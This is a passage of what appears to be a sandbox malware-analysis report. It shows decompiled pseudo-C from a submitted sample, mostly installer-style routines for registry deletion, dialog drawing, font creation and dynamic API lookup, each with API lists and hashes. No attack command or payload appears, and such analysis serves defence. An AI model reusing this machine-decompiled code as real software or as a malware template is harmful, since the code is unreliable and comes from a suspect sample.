                                                						if(_t52 <= 0 || _t52 > 0x19) {
                                                							_t51[0x18] = _t41;
                                                							goto L12;
                                                						} else {
                                                							_t37 = E6EB8135A(_t52 - 1);
                                                							L10:
                                                							goto L11;
                                                						}
                                                					} else {
                                                						_t37 = E6EB812E3();
                                                						L11:
                                                						_t52 = _t37;
                                                						L12:
                                                						_t13 =  &(_t51[8]); // 0x1020
                                                						_t42 = _t13;
                                                						if(_t51[4] >= 0) {
                                                						}
                                                						_t38 =  *_t51 & 0x000000ff;
                                                						_t51[0x1c] = 0;
                                                						if(_t38 > 7) {
                                                							L27:
                                                							_t39 = GlobalFree(_t52);
                                                							if( *(_t54 + 0x10) == 0) {
                                                								return _t39;
                                                							}
                                                							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                							} else {
                                                								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                							}
                                                							continue;
                                                						} else {
                                                							switch( *((intOrPtr*)(_t38 * 4 +  &M6EB825F8))) {
                                                								case 0:
                                                									 *_t42 = 0;
                                                									goto L27;
                                                								case 1:
                                                									__eax = E6EB813B1(__ebp);
                                                									goto L21;
                                                								case 2:
                                                									 *__edi = E6EB813B1(__ebp);
                                                									__edi[1] = __edx;
                                                									goto L27;
                                                								case 3:
                                                									__eax = GlobalAlloc(0x40,  *0x6eb8506c);
                                                									 *(__esi + 0x1c) = __eax;
                                                									__edx = 0;
                                                									 *__edi = __eax;
                                                									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x6eb8506c, __eax,  *0x6eb8506c, 0, 0);
                                                									goto L27;
                                                								case 4:
                                                									__eax = E6EB812CC(__ebp);
                                                									 *(__esi + 0x1c) = __eax;
                                                									L21:
                                                									 *__edi = __eax;
                                                									goto L27;
                                                								case 5:
                                                									__eax = GlobalAlloc(0x40, 0x10);
                                                									_push(__eax);
                                                									 *(__esi + 0x1c) = __eax;
                                                									_push(__ebp);
                                                									 *__edi = __eax;
                                                									__imp__CLSIDFromString();
                                                									goto L27;
                                                								case 6:
                                                									if( *__ebp != __cx) {
                                                										__eax = E6EB813B1(__ebp);
                                                										 *__ebx = __eax;
                                                									}
                                                									goto L27;
                                                								case 7:
                                                									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                									( *(__esi + 0x18) - 1) *  *0x6eb8506c =  *0x6eb85074 + ( *(__esi + 0x18) - 1) *  *0x6eb8506c * 2 + 0x18;
                                                									 *__ebx =  *0x6eb85074 + ( *(__esi + 0x18) - 1) *  *0x6eb8506c * 2 + 0x18;
                                                									asm("cdq");
                                                									__eax = E6EB81510(__edx,  *0x6eb85074 + ( *(__esi + 0x18) - 1) *  *0x6eb8506c * 2 + 0x18, __edx,  *0x6eb85074 + ( *(__esi + 0x18) - 1) *  *0x6eb8506c * 2);
                                                									goto L27;
                                                							}
                                                						}
                                                					}
                                                					L9:
                                                					_t37 = E6EB812CC(0x6eb85044);
                                                					goto L10;
                                                				}
                                                			}











                                                0x6eb82494
                                                0x6eb82498
                                                0x6eb824a3
                                                0x6eb824a3
                                                0x6eb824aa
                                                0x6eb824af
                                                0x00000000
                                                0x00000000
                                                0x6eb824b3
                                                0x6eb824b6
                                                0x00000000
                                                0x00000000
                                                0x6eb824bb
                                                0x6eb824c6
                                                0x6eb824d6
                                                0x00000000
                                                0x6eb824cd
                                                0x6eb824cf
                                                0x6eb824e5
                                                0x00000000
                                                0x6eb824e5
                                                0x6eb824bd
                                                0x6eb824bd
                                                0x6eb824e6
                                                0x6eb824e6
                                                0x6eb824e8
                                                0x6eb824ec
                                                0x6eb824ec
                                                0x6eb824ef
                                                0x6eb824ef
                                                0x6eb824f7
                                                0x6eb824ff
                                                0x6eb82502
                                                0x6eb825c1
                                                0x6eb825c2
                                                0x6eb825cd
                                                0x6eb825f7
                                                0x6eb825f7
                                                0x6eb825dd
                                                0x6eb825e9
                                                0x6eb825df
                                                0x6eb825df
                                                0x6eb825df
                                                0x00000000
                                                0x6eb82508
                                                0x6eb82508
                                                0x00000000
                                                0x6eb8250f
                                                0x00000000
                                                0x00000000
                                                0x6eb82517
                                                0x00000000
                                                0x00000000
                                                0x6eb82525
                                                0x6eb82527
                                                0x00000000
                                                0x00000000
                                                0x6eb82548
                                                0x6eb8254e
                                                0x6eb82551
                                                0x6eb82553
                                                0x6eb82563
                                                0x00000000
                                                0x00000000
                                                0x6eb82530
                                                0x6eb82535
                                                0x6eb82538
                                                0x6eb82539
                                                0x00000000
                                                0x00000000
                                                0x6eb8256f
                                                0x6eb82575
                                                0x6eb82576
                                                0x6eb82579
                                                0x6eb8257a
                                                0x6eb8257c
                                                0x00000000
                                                0x00000000
                                                0x6eb82588
                                                0x6eb8258b
                                                0x6eb82597
                                                0x6eb82599
                                                0x00000000
                                                0x00000000
                                                0x6eb825a5
                                                0x6eb825b1
                                                0x6eb825b4
                                                0x6eb825b6
                                                0x6eb825b9
                                                0x00000000
                                                0x00000000
                                                0x6eb82508
                                                0x6eb82502
                                                0x6eb824db
                                                0x6eb824e0
                                                0x00000000
                                                0x6eb824e0

                                                APIs
                                                • GlobalFree.KERNEL32 ref: 6EB825C2
                                                  • Part of subcall function 6EB812CC: lstrcpynW.KERNEL32(00000000,?,6EB8137F,00000019,6EB811CA,-000000A0), ref: 6EB812DC
                                                • GlobalAlloc.KERNEL32(00000040), ref: 6EB82548
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6EB82563
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                • Opcode ID: fb6591f1ad71f26015419cc5dde54330b9dfcd41033de06dc9db213845883301
                                                • Instruction ID: 0315c145c5b28726f2d62e39e9c745445b71ec2dd30f54a123833ef94fa68688
                                                • Opcode Fuzzy Hash: fb6591f1ad71f26015419cc5dde54330b9dfcd41033de06dc9db213845883301
                                                • Instruction Fuzzy Hash: 3241DCB0049786EFD7149FA9D850AAB7FE8FB56310F04881EE95687390E730A545CB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 48%
                                                			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                				void* _v8;
                                                				int _v12;
                                                				short _v536;
                                                				void* _t27;
                                                				signed int _t33;
                                                				intOrPtr* _t35;
                                                				signed int _t45;
                                                				signed int _t46;
                                                				signed int _t47;
                                                
                                                				_t46 = _a12;
                                                				_t47 = _t46 & 0x00000300;
                                                				_t45 = _t46 & 0x00000001;
                                                				_t27 = E00406374(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                				if(_t27 == 0) {
                                                					if((_a12 & 0x00000002) == 0) {
                                                						L3:
                                                						_push(0x105);
                                                						_push( &_v536);
                                                						_push(0);
                                                						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                							__eflags = _t45;
                                                							if(__eflags != 0) {
                                                								L10:
                                                								RegCloseKey(_v8);
                                                								return 0x3eb;
                                                							}
                                                							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                							__eflags = _t33;
                                                							if(_t33 != 0) {
                                                								break;
                                                							}
                                                							_push(0x105);
                                                							_push( &_v536);
                                                							_push(_t45);
                                                						}
                                                						RegCloseKey(_v8);
                                                						_t35 = E004068D4(3);
                                                						if(_t35 != 0) {
                                                							return  *_t35(_a4, _a8, _t47, 0);
                                                						}
                                                						return RegDeleteKeyW(_a4, _a8);
                                                					}
                                                					_v12 = 0;
                                                					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                						goto L10;
                                                					}
                                                					goto L3;
                                                				}
                                                				return _t27;
                                                			}












                                                0x00402eb4
                                                0x00402ebd
                                                0x00402ec6
                                                0x00402ed2
                                                0x00402edb
                                                0x00402ee5
                                                0x00402f0a
                                                0x00402f10
                                                0x00402f15
                                                0x00402f16
                                                0x00402f46
                                                0x00402f1f
                                                0x00402f21
                                                0x00402f71
                                                0x00402f74
                                                0x00000000
                                                0x00402f7a
                                                0x00402f30
                                                0x00402f35
                                                0x00402f37
                                                0x00000000
                                                0x00000000
                                                0x00402f3f
                                                0x00402f44
                                                0x00402f45
                                                0x00402f45
                                                0x00402f52
                                                0x00402f5a
                                                0x00402f61
                                                0x00000000
                                                0x00402f8a
                                                0x00000000
                                                0x00402f69
                                                0x00402ef5
                                                0x00402f08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402f08
                                                0x00402f90

                                                APIs
                                                • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                                                • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00401D81(void* __ebx, void* __edx) {
                                                				struct HWND__* _t30;
                                                				WCHAR* _t38;
                                                				void* _t48;
                                                				void* _t53;
                                                				signed int _t55;
                                                				signed int _t60;
                                                				long _t63;
                                                				void* _t65;
                                                
                                                				_t53 = __ebx;
                                                				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                				} else {
                                                					E00402D84(2);
                                                					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                				}
                                                				_t55 =  *(_t65 - 0x24);
                                                				 *(_t65 + 8) = _t30;
                                                				_t60 = _t55 & 0x00000004;
                                                				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                				if((_t55 & 0x00010000) == 0) {
                                                					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                				} else {
                                                					_t38 = E00402DA6(0x11);
                                                				}
                                                				 *(_t65 - 0x44) = _t38;
                                                				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                				asm("sbb esi, esi");
                                                				_t63 = LoadImageW( ~_t60 &  *0x42a220,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                					DeleteObject(_t48);
                                                				}
                                                				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                					_push(_t63);
                                                					E0040644E();
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t65 - 4));
                                                				return 0;
                                                			}











                                                0x00401d81
                                                0x00401d85
                                                0x00401d9a
                                                0x00401d87
                                                0x00401d89
                                                0x00401d8f
                                                0x00401d8f
                                                0x00401da0
                                                0x00401da3
                                                0x00401dad
                                                0x00401db0
                                                0x00401db8
                                                0x00401dc9
                                                0x00401dcc
                                                0x00401dd7
                                                0x00401dce
                                                0x00401dd0
                                                0x00401dd0
                                                0x00401ddb
                                                0x00401de5
                                                0x00401e0c
                                                0x00401e1b
                                                0x00401e29
                                                0x00401e31
                                                0x00401e39
                                                0x00401e39
                                                0x00401e42
                                                0x00401e48
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDlgItem.USER32 ref: 00401D9A
                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                • LoadImageW.USER32 ref: 00401E15
                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                                • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                                • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E00401E4E(intOrPtr __edx) {
                                                				void* __edi;
                                                				int _t9;
                                                				signed char _t15;
                                                				struct HFONT__* _t18;
                                                				intOrPtr _t30;
                                                				void* _t31;
                                                				struct HDC__* _t33;
                                                				void* _t35;
                                                
                                                				_t30 = __edx;
                                                				_t33 = GetDC( *(_t35 - 8));
                                                				_t9 = E00402D84(2);
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                				ReleaseDC( *(_t35 - 8), _t33);
                                                				 *0x40cdd8 = E00402D84(3);
                                                				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                				 *0x40cddf = 1;
                                                				 *0x40cddc = _t15 & 0x00000001;
                                                				 *0x40cddd = _t15 & 0x00000002;
                                                				 *0x40cdde = _t15 & 0x00000004;
                                                				E00406544(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
                                                				_t18 = CreateFontIndirectW(0x40cdc8);
                                                				_push(_t18);
                                                				_push(_t31);
                                                				E0040644E();
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}











                                                0x00401e4e
                                                0x00401e59
                                                0x00401e5b
                                                0x00401e68
                                                0x00401e7f
                                                0x00401e84
                                                0x00401e91
                                                0x00401e96
                                                0x00401e9a
                                                0x00401ea5
                                                0x00401eac
                                                0x00401ebe
                                                0x00401ec4
                                                0x00401ec9
                                                0x00401ed3
                                                0x00402638
                                                0x0040156d
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • GetDC.USER32(?), ref: 00401E51
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                • ReleaseDC.USER32 ref: 00401E84
                                                  • Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                  • Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nskE115.tmp\System.dll,00000000), ref: 00406743
                                                • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2584051700-0
                                                • Opcode ID: f838b5baf228103f5fd385e630955879067bc70170f13252a29975995c8fe6b2
                                                • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                                • Opcode Fuzzy Hash: f838b5baf228103f5fd385e630955879067bc70170f13252a29975995c8fe6b2
                                                • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6EB816BD(struct HINSTANCE__* _a4, short* _a8) {
                                                				_Unknown_base(*)()* _t7;
                                                				void* _t10;
                                                				int _t14;
                                                
                                                				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                				_t10 = GlobalAlloc(0x40, _t14);
                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                				_t7 = GetProcAddress(_a4, _t10);
                                                				GlobalFree(_t10);
                                                				return _t7;
                                                			}






                                                0x6eb816d7
                                                0x6eb816e3
                                                0x6eb816f0
                                                0x6eb816f7
                                                0x6eb81700
                                                0x6eb8170c

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6EB822D8,?,00000808), ref: 6EB816D5
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6EB822D8,?,00000808), ref: 6EB816DC
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6EB822D8,?,00000808), ref: 6EB816F0
                                                • GetProcAddress.KERNEL32(6EB822D8,00000000), ref: 6EB816F7
                                                • GlobalFree.KERNEL32 ref: 6EB81700
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.753716661.000000006EB81000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EB80000, based on PE: true
                                                • Associated: 00000000.00000002.753709872.000000006EB80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753728079.000000006EB84000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.753739144.000000006EB86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eb80000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                • Opcode ID: a124d1bfdb5047b39191a4611f9aa4587e960c011f8b0663b8d8283a875c5f36
                                                • Instruction ID: 3f13f83272c6f4f4f0f9cb6edf26a6450202b51797857031b8c17a4973bf9f60
                                                • Opcode Fuzzy Hash: a124d1bfdb5047b39191a4611f9aa4587e960c011f8b0663b8d8283a875c5f36
                                                • Instruction Fuzzy Hash: EBF0C0722065397FDA2116A78C4CC9BBE9CDF9B2F5B110315F728D2290C6615D02D7F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401C43(intOrPtr __edx) {
                                                				int _t29;
                                                				long _t30;
                                                				signed int _t32;
                                                				WCHAR* _t35;
                                                				long _t36;
                                                				int _t41;
                                                				signed int _t42;
                                                				int _t46;
                                                				int _t56;
                                                				intOrPtr _t57;
                                                				struct HWND__* _t63;
                                                				void* _t64;
                                                
                                                				_t57 = __edx;
                                                				_t29 = E00402D84(3);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 - 0x18) = _t29;
                                                				_t30 = E00402D84(4);
                                                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                				 *(_t64 + 8) = _t30;
                                                				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                				}
                                                				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                					 *(_t64 + 8) = E00402DA6(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t61 = E00402DA6();
                                                					_t32 = E00402DA6();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t35 =  ~( *_t31) & _t61;
                                                					__eflags = _t35;
                                                					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                					goto L10;
                                                				} else {
                                                					_t63 = E00402D84();
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t41 = E00402D84(2);
                                                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                					_t56 =  *(_t64 - 0x1c) >> 2;
                                                					if(__eflags == 0) {
                                                						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                						L10:
                                                						 *(_t64 - 0x38) = _t36;
                                                					} else {
                                                						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                					_push( *(_t64 - 0x38));
                                                					E0040644E();
                                                				}
                                                				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
                                                				return 0;
                                                			}















                                                0x00401c43
                                                0x00401c45
                                                0x00401c4c
                                                0x00401c4f
                                                0x00401c52
                                                0x00401c5c
                                                0x00401c60
                                                0x00401c63
                                                0x00401c6c
                                                0x00401c6c
                                                0x00401c6f
                                                0x00401c73
                                                0x00401c7c
                                                0x00401c7c
                                                0x00401c7f
                                                0x00401c83
                                                0x00401c85
                                                0x00401cda
                                                0x00401cdc
                                                0x00401ce7
                                                0x00401cf1
                                                0x00401cf4
                                                0x00401cf4
                                                0x00401cfd
                                                0x00000000
                                                0x00401c87
                                                0x00401c8e
                                                0x00401c90
                                                0x00401c93
                                                0x00401c99
                                                0x00401ca0
                                                0x00401ca3
                                                0x00401ccb
                                                0x00401d03
                                                0x00401d03
                                                0x00401ca5
                                                0x00401cb3
                                                0x00401cbb
                                                0x00401cbe
                                                0x00401cbe
                                                0x00401ca3
                                                0x00401d06
                                                0x00401d09
                                                0x00401d0f
                                                0x00402ba4
                                                0x00402ba4
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                                • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00404D10(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v68;
                                                				char _v132;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				signed int _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t52;
                                                				signed int _t53;
                                                				signed int _t55;
                                                
                                                				_t23 = _a16;
                                                				_t53 = _a12;
                                                				_t44 = 0xffffffdc;
                                                				if(_t23 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t24 = _t53;
                                                					if(_t53 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t44 = 0xffffffdd;
                                                					}
                                                					if(_t53 < 0x400) {
                                                						_t44 = 0xffffffde;
                                                					}
                                                					if(_t53 < 0xffff3333) {
                                                						_t52 = 0x14;
                                                						asm("cdq");
                                                						_t24 = 1 / _t52 + _t53;
                                                					}
                                                					_t25 = _t24 & 0x00ffffff;
                                                					_t55 = _t24 >> 0;
                                                					_t46 = 0xa;
